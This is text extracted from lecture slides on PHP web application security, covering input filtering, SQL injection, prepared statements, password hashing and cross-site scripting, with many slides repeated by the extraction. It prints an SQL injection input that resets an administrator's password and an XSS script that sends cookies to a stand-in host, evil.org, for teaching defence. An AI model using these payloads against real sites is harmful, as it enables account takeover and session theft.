I There are many ctype_ functions the canbe used to check the content of a string, forexample:

I ctype_alpha($str) is true if theargument contains only letters.

I ctype_alnum($str) is true if theargument contains only letters or digits.

I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.

I Also use the empty function to check if theparameter is set, as when validating anumber.

21 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a String

I There are many ctype_ functions the canbe used to check the content of a string, forexample:

I ctype_alpha($str) is true if theargument contains only letters.

I ctype_alnum($str) is true if theargument contains only letters or digits.

I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.

I Also use the empty function to check if theparameter is set, as when validating anumber.

21 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a String

I There are many ctype_ functions the canbe used to check the content of a string, forexample:

I ctype_alpha($str) is true if theargument contains only letters.

I ctype_alnum($str) is true if theargument contains only letters or digits.

I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.

I Also use the empty function to check if theparameter is set, as when validating anumber.

21 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Other Input

I Not only _GET and _POST data comesfrom client input.

I It is important to remember that allsuperglobals except _SESSION, i.e.,_GET, _POST, _COOKIE, _SERVER,_FILES, _ENV, _REQUEST, containclient data.

I Whenever reading from these, data mustbe validated.

22 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Other Input

I Not only _GET and _POST data comesfrom client input.

I It is important to remember that allsuperglobals except _SESSION, i.e.,_GET, _POST, _COOKIE, _SERVER,_FILES, _ENV, _REQUEST, containclient data.

I Whenever reading from these, data mustbe validated.

22 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Other Input

I Not only _GET and _POST data comesfrom client input.

I It is important to remember that allsuperglobals except _SESSION, i.e.,_GET, _POST, _COOKIE, _SERVER,_FILES, _ENV, _REQUEST, containclient data.

I Whenever reading from these, data mustbe validated.

22 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

23 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Database Access ControlI The PHP program shall connect to the database as

a user with as few rights as possible. Never let PHPconnect as a superuser, like root.

I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;

I This file can be included with an include directive,but shall not be accessible with HTTP requests.

I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.

I Alternatively, it can be protected as describedabove, in the section on file system security.

24 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Database Access ControlI The PHP program shall connect to the database as

a user with as few rights as possible. Never let PHPconnect as a superuser, like root.

I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;

I This file can be included with an include directive,but shall not be accessible with HTTP requests.

I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.

I Alternatively, it can be protected as describedabove, in the section on file system security.

24 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Database Access ControlI The PHP program shall connect to the database as

a user with as few rights as possible. Never let PHPconnect as a superuser, like root.

I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;

I This file can be included with an include directive,but shall not be accessible with HTTP requests.

I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.

I Alternatively, it can be protected as describedabove, in the section on file system security.

24 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Database Access ControlI The PHP program shall connect to the database as

a user with as few rights as possible. Never let PHPconnect as a superuser, like root.

I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;

I This file can be included with an include directive,but shall not be accessible with HTTP requests.

I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.

I Alternatively, it can be protected as describedabove, in the section on file system security.

24 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Database Access ControlI The PHP program shall connect to the database as

a user with as few rights as possible. Never let PHPconnect as a superuser, like root.

I Access to the database must be passwordprotected, which means the password must bestored somewhere it can be accessed by the PHPprogram, for example in a php file with the content:$username = ’myuser’;$password = ’mypass’;

I This file can be included with an include directive,but shall not be accessible with HTTP requests.

I Best is to place it outside of document root, wherethe web server can not access it. Both includeand require can accept a filesystem path.

I Alternatively, it can be protected as describedabove, in the section on file system security.

24 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SQL Injection

I As stated above, not properly validatinguser input can have severe consequences,one of which is that a malicious user canalter SQL statements, called SQL injection.

I Using SQL injection, an attacker creates oralters existing SQL commands to expose orchange hidden data, or to executecommands on the database host.

I This is accomplished by the applicationtaking user input and combining it withstatic parameters to build an SQL query.

25 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SQL Injection

I As stated above, not properly validatinguser input can have severe consequences,one of which is that a malicious user canalter SQL statements, called SQL injection.

I Using SQL injection, an attacker creates oralters existing SQL commands to expose orchange hidden data, or to executecommands on the database host.

I This is accomplished by the applicationtaking user input and combining it withstatic parameters to build an SQL query.

25 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SQL Injection

I As stated above, not properly validatinguser input can have severe consequences,one of which is that a malicious user canalter SQL statements, called SQL injection.

I Using SQL injection, an attacker creates oralters existing SQL commands to expose orchange hidden data, or to executecommands on the database host.

I This is accomplished by the applicationtaking user input and combining it withstatic parameters to build an SQL query.

25 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SQL Injection Example

I Consider the following PHP code, where$pwd and $uid are user input.$statement = "UPDATE usertable SET" .

" pwd=’$pwd’ WHERE uid=’$uid’;";// Execute the statement.

I A malicious user could specify the user id’ or uid like ’%admin%.

I Now the complete statement becomes"UPDATE usertable SET pwd=’...’ WHEREuid=’’ or uid like ’%admin%’;"

and the administrators password ischanged.

26 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SQL Injection Example

I Consider the following PHP code, where$pwd and $uid are user input.$statement = "UPDATE usertable SET" .

" pwd=’$pwd’ WHERE uid=’$uid’;";// Execute the statement.

I A malicious user could specify the user id’ or uid like ’%admin%.

I Now the complete statement becomes"UPDATE usertable SET pwd=’...’ WHEREuid=’’ or uid like ’%admin%’;"

and the administrators password ischanged.

26 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SQL Injection Example

I Consider the following PHP code, where$pwd and $uid are user input.$statement = "UPDATE usertable SET" .

" pwd=’$pwd’ WHERE uid=’$uid’;";// Execute the statement.

I A malicious user could specify the user id’ or uid like ’%admin%.

I Now the complete statement becomes"UPDATE usertable SET pwd=’...’ WHEREuid=’’ or uid like ’%admin%’;"

and the administrators password ischanged.

26 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting SQL Injection,Prepared Statements

I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.

I The prepared statement execution consists of twostages: prepare and execute.

I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.

I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.

27 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting SQL Injection,Prepared Statements

I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.

I The prepared statement execution consists of twostages: prepare and execute.

I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.

I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.

27 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting SQL Injection,Prepared Statements

I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.

I The prepared statement execution consists of twostages: prepare and execute.

I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.

I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.

27 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting SQL Injection,Prepared Statements

I The most common way to prohibit SQL injection is touse parameterized queries, implemented withprepared statements.

I The prepared statement execution consists of twostages: prepare and execute.

I At the prepare stage a statement template is sent tothe database server. The server performs a syntaxcheck and initializes server internal resources forlater use.

I During execute stage the client binds parametervalues and sends them to the server. The servercreates a statement from the statement templateand the bound values and executes it.

27 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prepared Statement ExampleI In the prepare stage, the SQL statement is defined

and parameters are specified as ?.$stmt = $mysqli->prepare(

"UPDATE usertable SET pwd=? WHERE uid=?;");

I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.

$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();

I Note that is it not possible to alter the statement.

I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.

28 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prepared Statement ExampleI In the prepare stage, the SQL statement is defined

and parameters are specified as ?.$stmt = $mysqli->prepare(

"UPDATE usertable SET pwd=? WHERE uid=?;");

I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.

$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();

I Note that is it not possible to alter the statement.

I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.

28 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prepared Statement ExampleI In the prepare stage, the SQL statement is defined

and parameters are specified as ?.$stmt = $mysqli->prepare(

"UPDATE usertable SET pwd=? WHERE uid=?;");

I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.

$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();

I Note that is it not possible to alter the statement.

I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.

28 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prepared Statement ExampleI In the prepare stage, the SQL statement is defined

and parameters are specified as ?.$stmt = $mysqli->prepare(

"UPDATE usertable SET pwd=? WHERE uid=?;");

I In the execute stage, the parameter values areinserted and the statement is executed. Theparameter ss means that both values are strings.

$stmt->bind_param(ss, $pwd, $uid);$stmt->execute();

I Note that is it not possible to alter the statement.

I User input ($pwd and $uid) shall always bevalidated, even if prepared statements are used.

28 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prepared Statements ImprovePerformance

I Prepared statements are not only moresecure, they are also faster than ordinarystatements when executing the samestatements multiple times.

I This is because they are interpreted onlyonce by the database server.

29 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prepared Statements ImprovePerformance

I Prepared statements are not only moresecure, they are also faster than ordinarystatements when executing the samestatements multiple times.

I This is because they are interpreted onlyonce by the database server.

29 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

30 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password EncryptionI Whenever the application includes some kind of

login mechanism, it is necessary to store user’spasswords.

I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.

I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.

I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.

I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.

31 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password EncryptionI Whenever the application includes some kind of

login mechanism, it is necessary to store user’spasswords.

I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.

I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.

I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.

I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.

31 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password EncryptionI Whenever the application includes some kind of

login mechanism, it is necessary to store user’spasswords.

I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.

I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.

I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.

I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.

31 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password EncryptionI Whenever the application includes some kind of

login mechanism, it is necessary to store user’spasswords.

I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.

I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.

I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.

I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.

31 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password EncryptionI Whenever the application includes some kind of

login mechanism, it is necessary to store user’spasswords.

I Passwords shall always be encrypted, not even thesystem administrator shall see clear text passwords.

I A hashing algorithm calculates a hash value, basedon an original value. It is not possible to recalculatethe original value from the hash.

I By applying a hashing algorithm to passwords, itbecomes impossible to determine the originalpassword.

I It is still possible to compare the resulting hash tothe original password by hashing also the passwordentered at login.

31 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Hashing

I Common hashing algorithms are MD5,SHA1 and SHA256, which are designed tobe very fast.

I In fact, they are so fast that it has becometrivial to calculate the original value fromthe hash simply by trying all possibleoriginal values until one that generates thesearched hash is found.

I Starting from PHP 5.5, there is a passwordhashing api which is a good replacementfor the above mentioned weak algorithms.

32 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Hashing

I Common hashing algorithms are MD5,SHA1 and SHA256, which are designed tobe very fast.

I In fact, they are so fast that it has becometrivial to calculate the original value fromthe hash simply by trying all possibleoriginal values until one that generates thesearched hash is found.

I Starting from PHP 5.5, there is a passwordhashing api which is a good replacementfor the above mentioned weak algorithms.

32 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Hashing

I Common hashing algorithms are MD5,SHA1 and SHA256, which are designed tobe very fast.

I In fact, they are so fast that it has becometrivial to calculate the original value fromthe hash simply by trying all possibleoriginal values until one that generates thesearched hash is found.

I Starting from PHP 5.5, there is a passwordhashing api which is a good replacementfor the above mentioned weak algorithms.

32 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Hashing ExampleI To hash a password before storing it, use

the password_hash function. ThePASSWORD_DEFAULT parameterspecifies that the default hashing algorithmshall be used.password_hash($password, PASSWORD_DEFAULT);

I To check a password entered at loginagainst a stored, hashed, password, usethe password_verify function. The$hash parameter is the hashed value readfrom the data storage.password_verify($password, $hash);

33 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Hashing ExampleI To hash a password before storing it, use

the password_hash function. ThePASSWORD_DEFAULT parameterspecifies that the default hashing algorithmshall be used.password_hash($password, PASSWORD_DEFAULT);

I To check a password entered at loginagainst a stored, hashed, password, usethe password_verify function. The$hash parameter is the hashed value readfrom the data storage.password_verify($password, $hash);

33 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

34 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cross Site Scripting, XSS

I Cross Site Scripting, XSS, means that anattacker injects HTML code, which is thendisplayed in an unknowing user’s browserwithout further validation.

I This can happen if a web server displayscontent that comes from any externalsource.

I The external source can be data submittedfrom browser, an email client, anadvertisement, a tracker or anything elsethat is inserted into the HTML document.

35 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cross Site Scripting, XSS

I Cross Site Scripting, XSS, means that anattacker injects HTML code, which is thendisplayed in an unknowing user’s browserwithout further validation.

I This can happen if a web server displayscontent that comes from any externalsource.

I The external source can be data submittedfrom browser, an email client, anadvertisement, a tracker or anything elsethat is inserted into the HTML document.

35 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cross Site Scripting, XSS

I Cross Site Scripting, XSS, means that anattacker injects HTML code, which is thendisplayed in an unknowing user’s browserwithout further validation.

I This can happen if a web server displayscontent that comes from any externalsource.

I The external source can be data submittedfrom browser, an email client, anadvertisement, a tracker or anything elsethat is inserted into the HTML document.

35 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,

say a user submits the following comment.<script>

window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie

</script>

I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.

I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.

I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.

36 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,

say a user submits the following comment.<script>

window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie

</script>

I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.

I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.

I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.

36 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,

say a user submits the following comment.<script>

window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie

</script>

I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.

I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.

I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.

36 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Cross Site Scripting ExampleI Consider the commenting feature of tasty recipes,

say a user submits the following comment.<script>

window.location.assign =’http://evil.org/steal_cookies.php?cookies=’ +document.cookie

</script>

I A user reading the comment is redirected toevil.org, all cookies associated with the currentsite are included in the query string of the URL.

I Once the attacker has the cookies they can be usedfor example to impersonate the user by using thecookie with the session id.

I This is not the best attack since it reveals itself bychanging document content. A better attack wouldbe to load an invisible image, which would alsogenerate a HTTP GET request.

36 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.

I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.I Never insert data in an attribute name.

I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.

I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.

I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS

I It is easy to prohibit XSS attacks if thefollowing rules can be obeyed.

I Never insert data anywhere in a <script>element.

I Never insert data in an HTML comment.I Never insert data in an attribute name.I Never insert data in an attribute value.I Never insert data in a tag name.I Never insert data anywhere in CSS, i.e., in a<style> tag.

I The above situations can be solved, butthat is not covered here.

37 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

